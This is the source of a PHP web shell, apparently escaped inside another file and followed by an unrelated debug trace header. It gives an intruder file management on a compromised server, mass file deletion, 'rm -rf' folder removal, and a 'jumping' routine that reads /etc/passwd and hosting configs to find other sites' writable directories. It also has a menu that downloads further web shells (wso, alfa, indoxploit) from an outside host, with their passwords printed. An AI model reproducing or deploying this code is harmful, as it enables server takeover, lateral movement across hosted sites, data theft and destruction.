{\r\n\t\t\t\t\tunlink(\"\".dirname(\$dir).\"/\$namafile\");\r\n\t\t\t\t}\r\n\t\t\t} else {\r\n\t\t\t\tif(is_dir(\$dirc)) {\r\n\t\t\t\t\tif(is_writable(\$dirc)) {\r\n\t\t\t\t\t\tif(file_exists(\$\xe2\x96\x9a)) {\r\n\t\t\t\t\t\t\tprint \"<pre>[<cmd>deleted</cmd>] \$\xe2\x96\x9a</pre>\";\r\n\t\t\t\t\t\t\tunlink(\$\xe2\x96\x9a);\r\n\t\t\t\t\t\t\t\$\xe2\x96\x9f = hapus_massal(\$dirc,\$namafile);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n} if(\$nana['start']) {\r\nprint \"<div style='margin: 5px auto; padding: 5px'>\";\r\n\thapus_massal(\$nana['d_dir'], \$nana['d_file']);\r\nprint \"</div>\";\r\n} else {\r\ns();\r\nprint \"\r\n<form action='?dir=\$path&id=delete' method='POST'>\r\n\t<b><i class='bi bi-folder'></i> Directory:</b>\r\n\t<input class='form-control btn-sm' type='text' name='d_dir' value='\$dir'>\r\n\t<b><i class='bi bi-file-earmark'></i> File name:</b>\r\n\t<div class='input-group mb-3'>\r\n\t<input class='form-control btn-sm' type='text' name='d_file' placeholder='name file'>\r\n\t<input class='btn btn-outline-light btn-sm' type='submit' name='start' value='Go'>\r\n</form>\r\n\t</div>\";\r\n\t\t}\r\n\t}\r\n}\r\n//zip & unzip Karawang Cyber Team\r\nif(\$nana['id'] == 'zip'){\r\n\$exzip = basename(\$dir).'.zip';\r\nfunction Zip(\$source, \$destination){\r\n\tif (extension_loaded('zip') === true){\r\n\t\tif (file_exists(\$source) === true){\r\n\t\t\t\$zip = new ZipArchive();\r\n\t\t\tif (\$zip->open(\$destination, ZIPARCHIVE::CREATE) === true){\r\n\t\t\t\t\$source = realpath(\$source);\r\n\t\t\t\tif (is_dir(\$source) === true){\r\n\t\t\t\t\t\$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(\$source), RecursiveIteratorIterator::SELF_FIRST);\r\n\t\t\t\t\tforeach (\$files as \$file){\r\n\t\t\t\t\t\t\$file = realpath(\$file);\r\n\t\t\t\t\t\tif (is_dir(\$file) === true){\r\n\t\t\t\t\t\t\t// \$zip->addEmptyDir(str_replace(\$source . '/', '', \$file . '/'));\r\n\t\t\t\t\t\t}elseif(is_file(\$file) === true){\r\n\t\t\t\t\t\t\t\$zip->addFromString(str_replace(\$source . '/', '', \$file), file_get_contents(\$file));\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}elseif(is_file(\$source) === true){\r\n\t\t\t\t\t\$zip->addFromString(basename(\$source), file_get_contents(\$source));\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\treturn @\$zip->close();\r\n\t\t}\r\n\t}\r\n\treturn false;\r\n}\r\n//Extract/Unzip\r\nfunction Zip_Extrack(\$zip_files, \$to_dir){\r\n\t\$zip = new ZipArchive();\r\n\t\$res = \$zip->open(\$zip_files);\r\n\tif (\$res === TRUE){\r\n\t\t\$name = basename(\$zip_files, \".zip\").\"_unzip\";\r\n\t\t@mkdir(\$name);\r\n\t\t@\$zip->extractTo(\$to_dir.\"/\".\$name); \r\n\t\treturn @\$zip->close();\r\n\t}else{\r\n\t\treturn false;\r\n\t}\r\n}\r\ns();\r\nprint \"\r\n<div class='container'>\r\n\t<div class='card text-dark'>\r\n\t\t<div class='card-header'>\r\n\t<b>Zip Menu</b>\r\n\t<form action='?dir=\$path&id=zip' enctype='multipart/form-data' method='POST'>\r\n\t\t<div class='input-group mb-3'>\r\n\t\t\t<input class='form-control form-control-sm' type='file' name='zip_file'>\r\n\t\t\t<input class='btn btn-dark btn-sm' type='submit' name='upnun' value='Submit'>\r\n\t\t</div>\r\n\t</form>\";\r\n\tif(\$nana[\"upnun\"]){\r\n\t\t\$filename = \$_FILES[\"zip_file\"][\"name\"];\r\n\t\t\$tmp = \$_FILES[\"zip_file\"][\"tmp_name\"];\r\n\t\tif(move_uploaded_file(\$tmp, \"\$dir/\$filename\")){\r\n\t\t\tprint Zip_Extrack(\$filename, \$dir);\r\n\t\t\tunlink(\$filename);\r\nprint '<strong>Ekstrak zip</strong> ok! '.alt_ok().'</div>';\r\n\t\t}else{\r\nprint '<strong>Ekstrak zip</strong> fail! '.alt_fail().'</div>';\r\n\t\t}\r\n\t}\r\nprint \"\r\n<b>Zip backup</b>\r\n<form action='?dir=\$path&id=zip' method='POST'>\r\n\t<label>location:</label>\r\n\t<div class='input-group mb-3'>\r\n\t\t<input class='form-control form-control-sm' type='text' name='folder' value='\$dir'>\r\n\t\t<input class='btn btn-dark btn-sm' type='submit' name='backup' value='Submit'>\r\n\t</div>\r\n</form>\";\r\n\tif(\$nana['backup']){\r\n\t\t\$fol = \$nana['folder'];\r\n\t\tif(Zip(\$fol, \$nana[\"folder\"].'/'.\$exzip)){\r\nprint '<strong>Created Zip</strong> ok! '.alt_ok().'</div>';;\r\n\t\t}else{\r\nprint '<strong>Created Zip</strong> fail! '.alt_ok().'</div>';\r\n\t\t}\r\n\t}\r\nprint \"\r\n<b>Unzip manual</b>\r\n\t<form action='?dir=\$path&id=zip' method='POST'>\r\n\t\t<label>location:</label>\r\n\t\t\t<div class='input-group mb-3'>\r\n\t\t\t<input class='form-control form-control-sm' type='text' name='file_zip' value='\$dir/\$exzip'>\r\n\t\t\t<input class='btn btn-dark btn-sm' type='submit' name='extrak' value='Submit'>\r\n\t\t</div>\r\n\t</form>\r\n\t</div>\r\n</div>\r\n</div>\r\n<br/>\";\r\n\tif(\$nana['extrak']){\r\n\t\t\$zip = \$nana[\"file_zip\"];\r\n\t\tif (Zip_Extrack(\$zip, \$dir)){\r\nprint '<strong>Ekstrak zip</strong> ok! '.alt_ok().'</div>';\r\n\t\t}else{\r\nprint '<strong>Ekstrak zip</strong> fail! '.alt_fail().'</div>';\r\n\t\t}\r\n\t}\r\n}\r\n// jumping #Karawang Cyber Team\r\nif(\$nana['id'] == 'jumping') {\r\ns();\r\n\t\$i = 0;\r\nprint \"\r\n<div class='container'>\r\n\t<div class='card text-dark'>\r\n\t<div class='card-header'>\";\r\n\tif(preg_match(\"/hsphere/\", \$dir)) {\r\n\t\t\$urls = explode(\"\\r\\n\", \$nana['url']);\r\n\t\tif(isset(\$nana['jump'])) {\r\n\t\t\tprint \"<pre>\";\r\n\t\t\tforeach(\$urls as \$url) {\r\n\t\t\t\t\$url = str_replace(array(\"https://\",\"www.\"), \"\", strtolower(\$url));\r\n\t\t\t\t\$etc = \"/etc/passwd\";\r\n\t\t\t\t\$f = fopen(\$etc,\"r\");\r\n\t\t\t\twhile(\$gets = fgets(\$f)) {\r\n\t\t\t\t\t\$pecah = explode(\":\", \$gets);\r\n\t\t\t\t\t\$user = \$pecah[0];\r\n\t\t\t\t\t\$dir_user = \"/hsphere/local/home/\$user\";\r\n\t\t\t\t\tif(is_dir(\$dir_user) === true) {\r\n\t\t\t\t\t\t\$url_user = \$dir_user.\"/\".\$url;\r\n\t\t\t\t\t\tif(is_readable(\$url_user)) {\r\n\t\t\t\t\t\t\t\$i++;\r\n\t\t\t\t\t\t\t\$jrw = \"[<cmd>R</cmd>] <a class='text-decoration-none' onclick='c(\\\"?dir=\$url_user\\\")'>\$url_user</a>\";\r\n\t\t\t\t\t\t\tif(is_writable(\$url_user)) {\r\n\t\t\t\t\t\t\t\t\$jrw = \"[<cmd>RW</cmd>] <a class='text-decoration-none' onclick='c(\\\"?dir=\$url_user\\\")'>\$url_user</a>\";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\tprint \$jrw.\"<br>\";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\tif(\$i == 0) { \r\n\t\t} else {\r\n\t\t\tprint \"<br>Totally available \$i from ip \".gethostbyname(\$_SERVER['HTTP_HOST']);\r\n\t\t}\r\n\t\tprint \"</pre>\";\r\n} else {\r\nprint \"\r\n<div class='text-center'>\r\n\t<form action='?dir=\$path&id=jumping' method='POST'>\r\n\t<b>List Domains:</b><br>\r\n\t\t<textarea class='form-control btn-sm' rows='10' name='url'>\";\r\n\t\t\t\$fp = fopen(\"/hsphere/local/config/httpd/sites/sites.txt\",\"r\");\r\n\t\t\t\twhile(\$getss = fgets(\$fp)) {\r\n\t\t\t\tprint \$getss;\r\n\t\t\t\t}\r\n\t\tprint '</textarea><br>\r\n\t\t<input class=\"btn btn-outline-light btn-sm btn-block\" type=\"submit\" name=\"jump\" value=\"Jumping\">\r\n\t</form>\r\n</div>';\r\n\t\t}\r\n\t} elseif(preg_match(\"/vhosts|vhost/\", \$dir)) {\r\n\t\tpreg_match(\"/\\/var\\/www\\/(.*?)\\//\", \$dir, \$vh);\r\n\t\t\$urls = explode(\"\\r\\n\", \$nana['url']);\r\n\t\tif(isset(\$nana['jump'])) {\r\n\t\t\tprint \"<pre>\";\r\n\t\t\tforeach(\$urls as \$url) {\r\n\t\t\t\t\$url = str_replace(\"www.\", \"\", \$url);\r\n\t\t\t\t\$web_vh = \"/var/www/\".\$vh[1].\"/\$url/httpdocs\";\r\n\t\t\t\tif(is_dir(\$web_vh) === true) {\r\n\t\t\t\t\tif(is_readable(\$web_vh)) {\r\n\t\t\t\t\t\t\$i++;\r\n\t\t\t\t\t\t\$jrw = \"[<cmd>R</cmd>] <a class='text-decoration-none' onclick='c(\\\"?dir=\$web_vh\\\")'>\$web_vh</a>\";\r\n\t\t\t\t\t\tif(is_writable(\$web_vh)) {\r\n\t\t\t\t\t\t\t\$jrw = \"[<cmd>RW</cmd>] <a class='text-decoration-none' onclick='c(\\\"?dir=\$web_vh\\\")'>\$web_vh</a>\";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\tprint \$jrw.\"<br>\";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\tif(\$i == 0) { \r\n\t\t} else {\r\n\t\t\tprint \"<br>Totally available \$i from ip \".gethostbyname(\$_SERVER['HTTP_HOST']);\r\n\t\t}\r\n\tprint \"</pre>\";\r\n} else {\r\nprint \"\r\n<div class='text-center'>\r\n\t<form action='?dir=\$path&id=jumping' method='POST'>\r\n\t<b>List Domains:</b> <br>\r\n\t\t<textarea class='form-control btn-sm' rows='10' name='url'>\";\r\n\t\t\tbing(\"ip:\".gethostbyname(\$_SERVER['HTTP_HOST']).\"\");\r\n\t\tprint '</textarea><br>\r\n\t\t<input class=\"btn btn-outline-light btn-sm btn-block\" type=\"submit\" name=\"jump\" value=\"Jumping\">\r\n\t</form>\r\n</div>';\r\n\t\t}\r\n\t} else {\r\n\t\tprint \"<pre>\";\r\n\t\t\$etc = fopen(\"/etc/passwd\", \"r\") or print(\"<rd>Can't read /etc/passwd</rd>\");\r\n\t\twhile(\$passwd = fgets(\$etc)) {\r\n\t\t\tif(\$passwd == '' || !\$etc) {\r\n\t\t\t\tprint \"<rd>Can't read /etc/passwd</rd>\";\r\n\t\t\t} else {\r\n\t\t\t\tpreg_match_all('/(.*?):x:/', \$passwd, \$user_jumping);\r\n\t\t\t\tforeach(\$user_jumping[1] as \$user_idx_jump) {\r\n\t\t\t\t\t\$user_jumping_dir = \"/home/\$user_idx_jump/public_html\";\r\n\t\t\t\t\tif(is_readable(\$user_jumping_dir)) {\r\n\t\t\t\t\t\t\$i++;\r\n\t\t\t\t\t\t\$jrw = \"[<cmd>R</cmd>] <a class='text-decoration-none' onclick='c(\\\"?dir=\$user_jumping_dir\\\")'>\$user_jumping_dir</a>\";\r\n\t\t\t\t\t\tif(is_writable(\$user_jumping_dir)) {\r\n\t\t\t\t\t\t\t\$jrw = \"[<cmd>RW</cmd>] <a class='text-decoration-none' onclick='c(\\\"?dir=\$user_jumping_dir\\\")'>\$user_jumping_dir</a>\";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\tprint \$jrw;\r\n\t\t\t\t\t\tif(function_exists('posix_getpwuid')) {\r\n\t\t\t\t\t\t\t\$domain_jump = file_get_contents(\"/etc/named.conf\");\t\r\n\t\t\t\t\t\t\tif(\$domain_jump == '') {\r\n\t\t\t\t\t\t\t\tprint \" => ( <rd>can't get the domain name</rd> )<br>\";\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\tpreg_match_all(\"#/var/named/(.*?).db#\", \$domain_jump, \$domains_jump);\r\n\t\t\t\t\t\t\t\tforeach(\$domains_jump[1] as \$dj) {\r\n\t\t\t\t\t\t\t\t\t\$user_jumping_url = posix_getpwuid(@fileowner(\"/etc/valiases/\$dj\"));\r\n\t\t\t\t\t\t\t\t\t\$user_jumping_url = \$user_jumping_url['name'];\r\n\t\t\t\t\t\t\t\t\tif(\$user_jumping_url == \$user_idx_jump) {\r\n\t\t\t\t\t\t\t\t\t\tprint \" => ( <u>\$dj</u> )<br>\";\r\n\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\tprint \"<br>\";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif(\$i == 0) { \r\n\t\t} else {\r\n\t\t\tprint \"<br>Totally available \$i from ip \".gethostbyname(\$_SERVER['HTTP_HOST']);\r\n\t\t}\r\n\t\tprint \"</pre>\";\r\n\t}\r\n\tprint \"</div>\r\n\t</div>\r\n</div><br/>\";\r\n}\r\n//openfile\r\nif(isset(\$nana['opn'])) {\r\n\t\$file = \$nana['opn'];\r\n}\t\r\n// view\r\nif(\$nana['action'] == 'view') {\r\ns();\r\nprint \"\r\n<div class='btn-group'>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=view&opn=\$file\\\")'><i class='bi bi-eye-fill'></i></a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=edit&opn=\$file\\\")'><i class='bi bi-pencil-square'></i></a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=rename&opn=\$file\\\")'><i class='bi bi-pencil-fill'></i></a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=delete_file&opn=\$file\\\")'><i class='bi bi-trash-fill'></i></a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=download&opn=\$file\\\")'><i class='bi bi-download'></i></a>\r\n</div>\r\n<br>\r\n\t<b><i class='bi bi-file-earmark'></i>: \".basename(\$file).\"</b>\r\n</br>\r\n<textarea class='form-control btn-sm' rows='10' disabled=''>\".htmlspecialchars(file_get_contents(\$file)).\"</textarea><br/>\";\r\n}\r\n// edit\r\nif(isset(\$nana['edit_file'])) {\r\n\t\$updt = fopen(\"\$file\", \"w\");\r\n\t\$hasil = fwrite(\$updt, \$nana['isi']);\t\t\r\n\tif (\$hasil) {\r\nprint '<strong>Edit file</strong> ok! '.alt_ok().'</div>';\r\n\t}else{\r\nprint '<strong>Edit file</strong> fail! '.alt_fail().'</div>';\r\n\t}\r\n}\r\nif(\$nana['action'] == 'edit') {\r\ns();\r\nprint \"\r\n<div class='btn-group'>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=view&opn=\$file\\\")'><i class='bi bi-eye-fill'></i></a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=edit&opn=\$file\\\")'><i class='bi bi-pencil-square'></i></a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=rename&opn=\$file\\\")'><i class='bi bi-pencil-fill'></i></a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=delete_file&opn=\$file\\\")'><i class='bi bi-trash-fill'></i></a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=download&opn=\$file\\\")'><i class='bi bi-download'></i></a>\r\n</div>\r\n<br>\r\n\t<b><i class='bi bi-file-earmark'></i>: \".basename(\$file).\"</b>\r\n</br>\r\n<form action='?dir=\$path&action=edit&opn=\$file' method='POST'>\r\n\t<textarea class='form-control btn-sm' rows='10' name='isi'>\".htmlspecialchars(file_get_contents(\$file)).\"</textarea>\r\n\t<br/>\r\n\t<button class='btn btn-outline-light btn-sm btn-block' type='sumbit' name='edit_file'><i class='bi bi-arrow-return-right'></i></button>\r\n</form>\";\r\n}\r\n//rename folder\r\nif(\$nana['action'] == 'rename_folder') {\r\n\tif(\$nana['r_d']) {\r\n\t\t\$r_d = rename(\$dir, \"\".dirname(\$dir).\"/\".htmlspecialchars(\$nana['r_d']).\"\");\r\n\t\tif(\$r_d) {\r\nprint '<strong>Rename folder</strong> ok! '.alt_ok().'<a class=\"btn-close\" href=\"?path='.dirname(\$dir).'\"></a></div>';\r\n\t\t}else{\r\nprint '<strong>Rename folder</strong> fail! '.alt_fail().'<a class=\"btn-close\" href=\"?path='.dirname(\$dir).'\"></a></div>';\r\n\t\t}\r\n\t}\r\ns();\r\nprint \"\r\n<div class='btn-group'>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=rename_folder\\\")'><i class='bi bi-pencil-fill'></i></a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=delete_folder\\\")'><i class='bi bi-trash-fill'></i></a>\r\n</div>\r\n<br>\r\n\t<b><i class='bi bi-folder-fill'></i>: \".basename(\$dir).\"</b>\r\n</br>\r\n<form action='?dir=\$path&action=rename_folder' method='POST'>\r\n<div class='input-group'>\r\n\t<input class='form-control btn-sm' type='text' value='\".basename(\$dir).\"' name='r_d'>\r\n\t<button class='btn btn-outline-light btn-sm' type='submit'><i class='bi bi-arrow-return-right'></i></button>\r\n</div>\r\n</form>\";\r\n}\r\n//rename file\r\nif(isset(\$nana['r_f'])) {\r\n\t\$old = \$file;\r\n\t\$new = \$nana['new_name'];\r\n\trename(\$new, \$old);\r\n\tif(file_exists(\$new)) {\r\nprint '<div class=\"alert alert-warning alert-dismissible fade show my-3\" role=\"alert\">\r\n\t<strong>Rename file</strong> name already in use! <button type=\"button\" class=\"btn-close\" data-bs-dismiss=\"alert\" aria-label=\"Close\"></button>\r\n</div>';\r\n\t}else{\r\nif(rename(\$old, \$new)) {\r\nprint '<strong>Rename file</strong> ok! '.alt_ok().'</div>';\r\n\t}else{\r\nprint '<strong>Rename file</strong> fail! '.alt_fail().'</div>';\r\n\t\t}\r\n\t}\r\n}\r\nif(\$nana['action'] == 'rename') {\r\ns();\r\nprint \"\r\n<div class='btn-group'>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=view&opn=\$file\\\")'><i class='bi bi-eye-fill'></i></a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=edit&opn=\$file\\\")'><i class='bi bi-pencil-square'></i></a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=rename&opn=\$file\\\")'><i class='bi bi-pencil-fill'></i></a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=delete_file&opn=\$file\\\")'><i class='bi bi-trash-fill'></i></a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=download&opn=\$file\\\")'><i class='bi bi-download'></i></a>\r\n</div>\r\n<br>\r\n\t<b><i class='bi bi-file-earmark'></i>: \".basename(\$file).\"</b>\r\n</br>\r\n<form action='?dir=\$path&action=rename&opn=\$file' method='POST'>\r\n<div class='input-group'>\r\n\t<input class='form-control btn-sm' type='text' name='new_name' value='\".basename(\$file).\"'>\r\n\t<button class='btn btn-outline-light btn-sm' type='sumbit' name='r_f'><i class='bi bi-arrow-return-right'></i></button>\r\n</div>\r\n</form>\";\r\n}\r\n//delete file\r\nif (\$nana['action'] == 'delete_file') {\r\n\t\$delete = unlink(\$file);\r\n\tif (\$delete) {\r\nprint '<strong>Delete file</strong> ok! '.alt_ok().'</div>';\r\n\t}else{\r\nprint '<strong>Delete file</strong> fail! '.alt_fail().'</div>';\r\n\t}\r\n}\r\n//delete folder\r\nif (\$nana['action'] == 'delete_folder' ) {\r\n\tif(is_dir(\$dir)) {\r\n\tif(is_writable(\$dir)) {\r\n\t\t@rmdir(\$dir);\r\n\t\t@exe(\"rm -rf \$dir\");\r\n\t\t@exe(\"rmdir /s /q \$dir\");\r\nprint '<strong>Delete folder</strong> ok! '.alt_ok().'<a class=\"btn-close\" href=\"?path='.dirname(\$dir).'\"></a></div>';\r\n\t\t} else {\r\nprint '<strong>Delete folder</strong> fail! '.alt_fail().'<a class=\"btn-close\" href=\"?path='.dirname(\$dir).'\"></a></div>';\r\n\t\t}\r\n\t}\r\n}\r\nprint '<div class=\"table-responsive\">\r\n<table class=\"table table-hover table-dark text-light\">\r\n<thead>\r\n<tr>\r\n\t<td class=\"text-center\">Name</td>\r\n\t\t<td class=\"text-center\">Type</td>\r\n\t\t<td class=\"text-center\">Last Edit</td>\r\n\t\t<td class=\"text-center\">Size</td>\r\n\t\t<td class=\"text-center\">Owner:Group</td>\r\n\t\t<td class=\"text-center\">Perms</td>\r\n\t<td class=\"text-center\">Action</td>\r\n</tr>\r\n</thead>\r\n<tbody class=\"text-nowrap\">';\t\t\r\nforeach(\$scand as \$dir){\r\n\t\$dt = date(\"Y-m-d G:i\", filemtime(\"\$path/\$dir\"));\r\n\tif(strlen(\$dir) > 25) {\r\n\t\t\$_d = substr(\$dir, 0, 25).\"...\";\t\t\r\n\t}else{\r\n\t\t\$_d = \$dir;\r\n\t}\r\n\tif(function_exists('posix_getpwuid')) {\r\n\t\t\$downer = @posix_getpwuid(fileowner(\"\$path/\$dir\"));\r\n\t\t\$downer = \$downer['name'];\r\n\t} else {\r\n\t\t\$downer = fileowner(\"\$path/\$dir\");\r\n\t}\r\n\tif(function_exists('posix_getgrgid')) {\r\n\t\t\$dgrp = @posix_getgrgid(filegroup(\"\$path/\$dir\"));\r\n\t\t\$dgrp = \$dgrp['name'];\r\n\t} else {\r\n\t\t\$dgrp = filegroup(\"\$path/\$dir\");\r\n\t}\r\n\tif(!is_dir(\$path.'/'.\$file)) continue;\r\n\t\t\$size = filesize(\$path.'/'.\$file)/1024;\r\n\t\t\$size = round(\$size,3);\r\n\tif(\$size >= 1024){\r\n\t\t\$size = round(\$size/1024,2).' MB';\r\n\t}else{\r\n\t\t\$size = \$size.' KB';\r\n\t}\r\nif(!is_dir(\$path.'/'.\$dir) || \$dir == '.' || \$dir == '..') continue;\r\nprint \"\r\n<tr>\r\n\t<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' onclick='c(\\\"?dir=\$path/\$dir\\\")'>\$_d</a></td>\r\n\t<td class='text-center'>dir</td>\r\n\t<td class='text-center'>\$dt</td>\r\n\t<td class='text-center'>-</td>\r\n\t<td class='text-center'>\$downer<cmd>@</cmd>\$dgrp</td>\r\n\t<td class='text-center'>\";\r\n\t\tif(is_writable(\$path.'/'.\$dir)) echo '<cmd>';\r\n\t\t\telseif(!is_readable(\$path.'/'.\$dir)) echo '<rd>';\r\n\t\techo p(\$path.'/'.\$dir);\r\n\t\tif(is_writable(\$path.'/'.\$dir) || !is_readable(\$path.'/'.\$dir)) echo '</font></center></td>';\r\nprint \"\r\n\t<td class='text-center'>\r\n\t<div class='btn-group'>\r\n\t\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path/\$dir&action=rename_folder\\\")'><i class='bi bi-pencil-fill'></i></a><a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path/\$dir&action=delete_folder\\\")'><i class='bi bi-trash-fill'></i></a>\r\n\t</div>\r\n\t</td>\r\n</tr>\";\r\n}\r\nforeach(\$scand as \$file){\r\n\t\$ft = date(\"Y-m-d G:i\", filemtime(\"\$path/\$file\"));\r\n\tif(function_exists('posix_getpwuid')) {\r\n\t\t\$fowner = @posix_getpwuid(fileowner(\"\$path/\$file\"));\r\n\t\t\$fowner = \$fowner['name'];\r\n\t} else {\r\n\t\t\$fowner = fileowner(\"\$path/\$file\");\r\n\t}\r\n\tif(function_exists('posix_getgrgid')) {\r\n\t\t\$fgrp = @posix_getgrgid(filegroup(\"\$path/\$file\"));\r\n\t\t\$fgrp = \$fgrp['name'];\r\n\t} else {\r\n\t\t\$fgrp = filegroup(\"\$path/\$file\");\r\n\t}\r\n\tif(!is_file(\$path.'/'.\$file)) continue;\r\n\tif(strlen(\$file) > 25) {\r\n\t\t\$_f = substr(\$file, 0, 25).\"...-.\".\$ext;\t\t\r\n\t}else{\r\n\t\t\$_f = \$file;\r\n\t}\r\nprint \"\r\n<tr>\r\n<td><i class='bi bi-file-earmark-text-fill'></i><a class='text-decoration-none text-secondary' onclick='c(\\\"?dir=\$path&action=view&opn=\$file\\\")'>\$_f</a></td>\r\n\t<td class='text-center'>file</td>\r\n\t<td class='text-center'>\$ft</td>\r\n\t<td class='text-center'>\".sz(filesize(\$file)).\"</td>\r\n\t<td class='text-center'>\$fowner<cmd>@</cmd>\$fgrp</td>\r\n\t<td class='text-center'>\";\r\n\tif(is_writable(\$path.'/'.\$file)) echo '<cmd>';\r\n\telseif(!is_readable(\$path.'/'.\$file)) echo '<rd>';\r\n\t\techo p(\$path.'/'.\$file);\r\n\tif(is_writable(\$path.'/'.\$file) || !is_readable(\$path.'/'.\$file)) echo '</font></td>';\r\nprint \"\r\n\t<td class='text-center'>\r\n\t<div class='btn-group'>\r\n\t\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=view&opn=\$path/\$file\\\")'><i class='bi bi-eye-fill'></i></a>\r\n\t\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=edit&opn=\$path/\$file\\\")'><i class='bi bi-pencil-square'></i></a>\r\n\t\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=rename&opn=\$path/\$file\\\")'><i class='bi bi-pencil-fill'></i></a>\r\n\t\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=delete_file&opn=\$path/\$file\\\")'><i class='bi bi-trash-fill'></i></a>\r\n\t\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&action=download&opn=\$path/\$file\\\")'><i class='bi bi-download'></i></a>\r\n\t</div>\r\n\t</td>\r\n</tr>\";\r\n}\r\n?>\r\n</tbody>\r\n</table>\r\n</div>\r\n<?php\r\nswitch (\$nana['op'])\r\n\t{\r\ncase ('1'):\r\nswitch (true)\r\n\t{\r\ncase (op('adminer.php', 'https://random-php.ftp.sh/adminer.txt')):\r\n\t\$ok = '<strong>adminer.php > </strong>ok! '.alt_ok().'</div>';\r\n\t}\r\n\tbreak;\r\ncase ('2'):\r\nswitch (true)\r\n\t{\r\ncase (op('alfa.php', 'https://random-php.ftp.sh/alfa.txt')):\r\n\t\$ok = '<strong>alfa.php > </strong>ok! '.alt_ok().'</div>';\r\n\t}\r\n\tbreak;\r\ncase ('3'):\r\nswitch (true)\r\n\t{\r\ncase (op('indosec.php', 'https://random-php.ftp.sh/ids.txt')):\r\n\t\$ok = '<strong>indosec.php > </strong>ok! '.alt_ok().'pass: IndoSec</div>';\r\n\t}\r\n\tbreak;\r\ncase ('4'):\r\nswitch (true)\r\n\t{\r\ncase (op('indoxploit-v2.php', 'https://random-php.ftp.sh/idx-v2.txt')):\r\n\t\$ok = '<strong>indoxploit-v2.php > </strong>ok! '.alt_ok().'pass: IndoXploit</div>';\r\n\t}\r\n\tbreak;\r\ncase ('5'):\r\nswitch (true)\r\n\t{\r\ncase (op('indoxploit-v3.php', 'https://random-php.ftp.sh/idx-v3.txt')):\r\n\t\$ok = '<strong>indoxploit-v3.php > </strong>ok! '.alt_ok().'pass: IndoXploit</div>';\r\n\t}\r\n\tbreak;\r\ncase ('6'):\r\nswitch (true)\r\n\t{\r\ncase (op('wso.php', 'https://random-php.ftp.sh/wso.txt')):\r\n\t\$ok = '<strong>wso.php > </strong>ok! '.alt_ok().'pas: ghost287</div>';\r\n\t}\r\n\tbreak;\r\ncase ('7'):\r\nswitch (true)\r\n\t{\r\ncase (op('fox-wso.php', 'https://random-php.ftp.sh/fox-wso.txt')):\r\n\t\$ok = '<strong>fox-wso.php > </strong>ok! '.alt_ok().'</div>';\r\n\t}\r\n}\r\nprint \"\$ok\r\n<form action='?dir=\$path' method='POST'>\r\n<div class='input-group'>\r\n\t<select class='form-select form-select-sm' name='op'>\r\n\t\t<option selected disabled>select</option>\r\n\t\t<option value='1'>adminer</option>\r\n\t\t<option value='2'>alfa shell</option>\r\n\t\t<option value='3'>indosec shell</option>\r\n\t\t<option value='4'>indoxploit-v2 shell</option>\r\n\t\t<option value='5'>indoxploit-v3 shell</option>\r\n\t\t<option value='6'>wso shell</option>\r\n\t\t<option value='7'>fox wso shell</option>\r\n\t</select>\r\n\t\t<button class='btn btn-outline-light btn-sm'><i class='bi bi-arrow-return-right'></i></button>\r\n\t</form>\r\n</div>\r\n\t<div class='text-secondary'>Recode By S4dboyXPLOID404 Ft UCEN HAXOR</div>\";\r\n?>\r\n</div>\r\n</div>\r\n</div>\r\n</body>\r\n</html>");
exit;Execution traces
data/traces/3a3d8d8369d1a82eac4058d23e6cfe14_trace-1676261577.3932.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:13:23.291065]
1 0 1 0.000150 393528
